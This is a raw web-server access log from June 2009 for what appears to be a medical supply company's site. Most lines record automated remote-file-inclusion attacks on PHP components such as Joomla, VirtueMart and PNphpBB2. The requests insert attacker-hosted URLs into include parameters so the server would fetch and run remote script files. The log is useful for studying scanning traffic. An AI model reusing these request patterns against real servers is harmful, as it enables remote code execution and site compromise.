217.70.32.2 - - [15/Jun/2009:04:14:32 -0400] "GET //payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://book-ua.org//upload/idr.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
217.70.32.2 - - [15/Jun/2009:04:14:32 -0400] "GET /logs//payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://book-ua.org//upload/idr.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
66.249.71.54 - - [15/Jun/2009:04:14:45 -0400] "GET /images/index11_oscill.jpg HTTP/1.1" 200 3756 "-" "Googlebot-Image/1.0"
211.133.240.90 - - [15/Jun/2009:04:14:45 -0400] "GET /logs/access_log.Q109052200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://zoulekreunion.com/images/html.png??? HTTP/1.1" 404 277 "-" "libwww-perl/5.825"
211.133.240.90 - - [15/Jun/2009:04:14:45 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://zoulekreunion.com/images/html.png??? HTTP/1.1" 404 250 "-" "libwww-perl/5.825"
211.133.240.90 - - [15/Jun/2009:04:14:46 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://zoulekreunion.com/images/html.png??? HTTP/1.1" 404 255 "-" "libwww-perl/5.825"
209.59.12.99 - - [15/Jun/2009:04:14:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
204.3.160.214 - - [15/Jun/2009:04:14:56 -0400] "GET /logs/access_log.Q109052400%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 271 "-" "Mozilla/5.0"
81.176.230.136 - - [15/Jun/2009:04:15:16 -0400] "GET /logs/access_log.Q109060500//payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://book-ua.org//upload/idr.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
81.176.230.136 - - [15/Jun/2009:04:15:16 -0400] "GET /logs//payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://book-ua.org//upload/idr.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
81.176.230.136 - - [15/Jun/2009:04:15:16 -0400] "GET //payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://book-ua.org//upload/idr.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
217.147.29.190 - - [15/Jun/2009:04:15:20 -0400] "GET /logs//payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://book-ua.org//upload/idr.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
217.147.29.190 - - [15/Jun/2009:04:15:20 -0400] "GET /logs/access_log.Q109060500//payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://book-ua.org//upload/idr.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
211.133.240.90 - - [15/Jun/2009:04:15:22 -0400] "GET /logs/access_log.Q109052900///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://zoulekreunion.com/images/html.png??? HTTP/1.1" 404 277 "-" "libwww-perl/5.825"
217.147.29.190 - - [15/Jun/2009:04:15:24 -0400] "GET //payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://book-ua.org//upload/idr.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
204.3.160.214 - - [15/Jun/2009:04:15:27 -0400] "GET /logs/access_log.Q109052400%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 271 "-" "Mozilla/5.0"
216.55.183.191 - - [15/Jun/2009:04:15:37 -0400] "GET /logs/error_log.Q109060500%20%20//payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
217.147.29.190 - - [15/Jun/2009:04:15:40 -0400] "GET /logs/access_log.Q109060500//payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://book-ua.org//upload/idr.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
217.147.29.190 - - [15/Jun/2009:04:15:40 -0400] "GET /logs//payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://book-ua.org//upload/idr.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
217.147.29.190 - - [15/Jun/2009:04:15:40 -0400] "GET //payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://book-ua.org//upload/idr.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
217.70.32.2 - - [15/Jun/2009:04:15:51 -0400] "GET //payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://book-ua.org//upload/idr.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
217.70.32.2 - - [15/Jun/2009:04:15:51 -0400] "GET /logs/access_log.Q109060500//payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://book-ua.org//upload/idr.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
217.70.32.2 - - [15/Jun/2009:04:15:54 -0400] "GET /logs//payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://book-ua.org//upload/idr.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
217.70.32.2 - - [15/Jun/2009:04:16:00 -0400] "GET /logs/error_log.Q108032700%20%20//payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
200.142.148.142 - - [15/Jun/2009:04:16:59 -0400] "GET /logs/access_log.Q109050700//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
200.142.148.142 - - [15/Jun/2009:04:17:00 -0400] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
62.149.240.214 - - [15/Jun/2009:04:18:04 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://3dcgfx.net/3dcgfx//modules/Forums/admin/test.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
62.149.240.214 - - [15/Jun/2009:04:18:04 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://3dcgfx.net/3dcgfx//modules/Forums/admin/test.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
200.142.148.142 - - [15/Jun/2009:04:18:10 -0400] "GET /logs/access_log.Q109052600//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
88.246.193.19 - - [15/Jun/2009:04:18:16 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; GIGASIZE={--BCD3DADE0C8243458E54B729CD78F4A6--}; .NET CLR 2.0.50727)"
88.246.193.19 - - [15/Jun/2009:04:18:18 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; GIGASIZE={--BCD3DADE0C8243458E54B729CD78F4A6--}; .NET CLR 2.0.50727)"
88.246.193.19 - - [15/Jun/2009:04:18:19 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; GIGASIZE={--BCD3DADE0C8243458E54B729CD78F4A6--}; .NET CLR 2.0.50727)"
88.246.193.19 - - [15/Jun/2009:04:18:19 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; GIGASIZE={--BCD3DADE0C8243458E54B729CD78F4A6--}; .NET CLR 2.0.50727)"
218.246.20.221 - - [15/Jun/2009:04:18:36 -0400] "GET /logs/access_log.Q109052400%20%20///components/errors.php?error=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
217.147.29.190 - - [15/Jun/2009:04:19:01 -0400] "GET /logs/error_log.Q109060500//payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://book-ua.org//upload/idr.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
217.70.32.2 - - [15/Jun/2009:04:19:07 -0400] "GET /logs/error_log.Q108032700//payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://book-ua.org//upload/idr.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
217.70.32.2 - - [15/Jun/2009:04:19:15 -0400] "GET /logs/error_log.Q109060500//payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://book-ua.org//upload/idr.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
204.3.160.214 - - [15/Jun/2009:04:19:30 -0400] "GET /logs/access_log.Q109052800//RGboard/rg4_board/_footer.php?skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 255 "-" "Mozilla/5.0"
204.3.160.214 - - [15/Jun/2009:04:19:30 -0400] "GET //RGboard/rg4_board/_footer.php?skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 228 "-" "Mozilla/5.0"
204.3.160.214 - - [15/Jun/2009:04:19:30 -0400] "GET /logs//RGboard/rg4_board/_footer.php?skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 233 "-" "Mozilla/5.0"
116.121.201.70 - - [15/Jun/2009:04:19:32 -0400] "GET //?path%5Bdocroot%5D=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
116.121.201.70 - - [15/Jun/2009:04:19:32 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 200 5577 "-" "Mozilla/5.0"
116.121.201.70 - - [15/Jun/2009:04:19:33 -0400] "GET /logs/access_log.Q109060200//?path%5Bdocroot%5D=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
204.3.160.214 - - [15/Jun/2009:04:19:40 -0400] "GET //RGboard/rg4_board/_footer.php?skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 228 "-" "Mozilla/5.0"
204.3.160.214 - - [15/Jun/2009:04:19:40 -0400] "GET /logs//RGboard/rg4_board/_footer.php?skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 233 "-" "Mozilla/5.0"
204.3.160.214 - - [15/Jun/2009:04:19:40 -0400] "GET /logs/access_log.Q109052800//RGboard/rg4_board/_footer.php?skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 255 "-" "Mozilla/5.0"
218.246.20.221 - - [15/Jun/2009:04:19:43 -0400] "GET /logs/access_log.Q109060800%20%20///index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
116.121.201.70 - - [15/Jun/2009:04:19:46 -0400] "GET //?path%5Bdocroot%5D=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
116.121.201.70 - - [15/Jun/2009:04:19:46 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 200 5577 "-" "Mozilla/5.0"
116.121.201.70 - - [15/Jun/2009:04:19:49 -0400] "GET /logs/access_log.Q109060200//?path%5Bdocroot%5D=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
217.147.29.190 - - [15/Jun/2009:04:19:51 -0400] "GET /logs/error_log.Q109060500//payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://book-ua.org//upload/idr.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
81.176.230.136 - - [15/Jun/2009:04:19:55 -0400] "GET /logs/error_log.Q109060500//payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://book-ua.org//upload/idr.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
213.192.241.94 - - [15/Jun/2009:04:19:56 -0400] "GET /logs//RGboard/rg4_board/_footer.php?skin_path=http://sbnc.hak.su/spread.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
213.192.241.94 - - [15/Jun/2009:04:19:56 -0400] "GET //RGboard/rg4_board/_footer.php?skin_path=http://sbnc.hak.su/spread.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Jun/2009:04:19:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.192.241.94 - - [15/Jun/2009:04:19:57 -0400] "GET /logs/access_log.Q109052800//RGboard/rg4_board/_footer.php?skin_path=http://sbnc.hak.su/spread.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
123.125.64.44 - - [15/Jun/2009:04:20:04 -0400] "GET /logs/access_log.Q108040200 HTTP/1.1" 404 224 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
116.121.201.70 - - [15/Jun/2009:04:20:06 -0400] "GET /logs/access_log.Q109050700//?path%5Bdocroot%5D=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
118.129.166.10 - - [15/Jun/2009:04:20:09 -0400] "GET /logs/access_log.Q109051000//modules/xfsection/modify.php?dir_module=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
116.121.201.70 - - [15/Jun/2009:04:20:17 -0400] "GET /logs/access_log.Q109050700//?path%5Bdocroot%5D=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
217.70.32.2 - - [15/Jun/2009:04:20:22 -0400] "GET /logs/error_log.Q108032700//payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://book-ua.org//upload/idr.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
81.176.230.136 - - [15/Jun/2009:04:20:23 -0400] "GET /logs/error_log.Q109060500//payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://book-ua.org//upload/idr.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
217.70.32.2 - - [15/Jun/2009:04:20:29 -0400] "GET /logs/error_log.Q109060500//payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://book-ua.org//upload/idr.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
217.125.38.117 - - [15/Jun/2009:04:20:32 -0400] "GET /logs//RGboard/rg4_board/_footer.php?skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
217.125.38.117 - - [15/Jun/2009:04:20:33 -0400] "GET /logs/access_log.Q109052800//RGboard/rg4_board/_footer.php?skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
217.125.38.117 - - [15/Jun/2009:04:20:33 -0400] "GET //RGboard/rg4_board/_footer.php?skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
118.129.166.10 - - [15/Jun/2009:04:20:36 -0400] "GET /logs/access_log.Q109051100//modules/xfsection/modify.php?dir_module=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
204.3.160.214 - - [15/Jun/2009:04:20:46 -0400] "GET /logs/access_log.Q109060100//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 269 "-" "Mozilla/5.0"
204.3.160.214 - - [15/Jun/2009:04:20:47 -0400] "GET /logs/access_log.Q109052400//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 269 "-" "Mozilla/5.0"
204.3.160.214 - - [15/Jun/2009:04:20:58 -0400] "GET /logs/access_log.Q109060100//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 269 "-" "Mozilla/5.0"
204.3.160.214 - - [15/Jun/2009:04:21:05 -0400] "GET /logs/access_log.Q109052400//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 269 "-" "Mozilla/5.0"
121.165.73.157 - - [15/Jun/2009:04:21:47 -0400] "GET //RGboard/rg4_board/_footer.php?skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
121.165.73.157 - - [15/Jun/2009:04:21:47 -0400] "GET /logs//RGboard/rg4_board/_footer.php?skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
121.165.73.157 - - [15/Jun/2009:04:21:47 -0400] "GET /logs/access_log.Q109052800//RGboard/rg4_board/_footer.php?skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
116.121.201.70 - - [15/Jun/2009:04:21:55 -0400] "GET /logs/access_log.Q109060200%20%20//?path%5Bdocroot%5D=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
116.121.201.70 - - [15/Jun/2009:04:21:57 -0400] "GET /logs/access_log.Q109060200%20%20//?path%5Bdocroot%5D=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
116.121.201.70 - - [15/Jun/2009:04:22:04 -0400] "GET /logs/access_log.Q109050700%20%20//?path%5Bdocroot%5D=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
204.3.160.214 - - [15/Jun/2009:04:22:08 -0400] "GET /logs/access_log.Q109052800%20%20//RGboard/rg4_board/_footer.php?skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 257 "-" "Mozilla/5.0"
116.121.201.70 - - [15/Jun/2009:04:22:17 -0400] "GET /logs/access_log.Q109050700%20%20//?path%5Bdocroot%5D=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
204.3.160.214 - - [15/Jun/2009:04:22:30 -0400] "GET /logs/access_log.Q109052800%20%20//RGboard/rg4_board/_footer.php?skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.0" 404 257 "-" "Mozilla/5.0"
216.55.183.191 - - [15/Jun/2009:04:22:39 -0400] "GET /logs/access_log.Q109060500//payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
216.55.183.191 - - [15/Jun/2009:04:22:44 -0400] "GET /logs/error_log.Q109060500//payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
203.180.104.76 - - [15/Jun/2009:04:22:58 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/product_info.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ja-JP-mac; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
203.180.104.76 - - [15/Jun/2009:04:22:58 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/product_info.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ja-JP-mac; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
218.246.20.221 - - [15/Jun/2009:04:22:59 -0400] "GET /logs///index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
203.180.104.76 - - [15/Jun/2009:04:23:00 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/product_info.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ja-JP-mac; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
203.180.104.76 - - [15/Jun/2009:04:23:00 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/product_info.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ja-JP-mac; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
218.246.20.221 - - [15/Jun/2009:04:23:10 -0400] "GET /logs/access_log.Q109053100///index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
81.169.136.209 - - [15/Jun/2009:04:23:41 -0400] "GET /logs/access_log.Q109052900///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.246.20.221 - - [15/Jun/2009:04:24:15 -0400] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
217.125.38.117 - - [15/Jun/2009:04:24:21 -0400] "GET /logs/access_log.Q109052800%20%20//RGboard/rg4_board/_footer.php?skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
218.246.20.221 - - [15/Jun/2009:04:24:24 -0400] "GET /logs/access_log.Q109050700//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
121.169.189.169 - - [15/Jun/2009:04:24:36 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L10859C4956620400846F04W+M37+ENG HTTP/1.1" 200 44717 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L10859A4C5F82E400186F04V+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5"
218.246.20.221 - - [15/Jun/2009:04:24:56 -0400] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Jun/2009:04:24:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.246.20.221 - - [15/Jun/2009:04:25:03 -0400] "GET /logs/access_log.Q109050700%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
212.150.107.30 - - [15/Jun/2009:04:25:22 -0400] "GET /logs/access_log.Q109010700//index.php?pagina=http://www.eyepro.net//assets/images/na-id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
217.70.32.2 - - [15/Jun/2009:04:27:35 -0400] "GET /logs/access_log.Q109060500//payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
217.70.32.2 - - [15/Jun/2009:04:27:39 -0400] "GET /logs/error_log.Q109060500//payment/secpay/secpay.inc.php?config%5Broot_dir%5D=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
121.165.73.157 - - [15/Jun/2009:04:29:03 -0400] "GET /logs/access_log.Q109052800%20%20//RGboard/rg4_board/_footer.php?skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
218.246.20.221 - - [15/Jun/2009:04:29:54 -0400] "GET /logs/access_log.Q109052500///components/errors.php?error=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Jun/2009:04:29:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.246.20.221 - - [15/Jun/2009:04:30:28 -0400] "GET /logs/access_log.Q109052600%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
211.189.40.249 - - [15/Jun/2009:04:31:53 -0400] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.189.40.249 - - [15/Jun/2009:04:31:53 -0400] "GET /logs/access_log.Q109052100/components/com_colorlab/admin.color.php?mosConfig_live_site=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
211.189.40.249 - - [15/Jun/2009:04:31:53 -0400] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.246.20.221 - - [15/Jun/2009:04:32:13 -0400] "GET /logs/access_log.Q109053100///index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://inbus.cn/home/copyright.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.189.40.249 - - [15/Jun/2009:04:32:50 -0400] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.189.40.249 - - [15/Jun/2009:04:32:50 -0400] "GET /logs/access_log.Q109052100%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
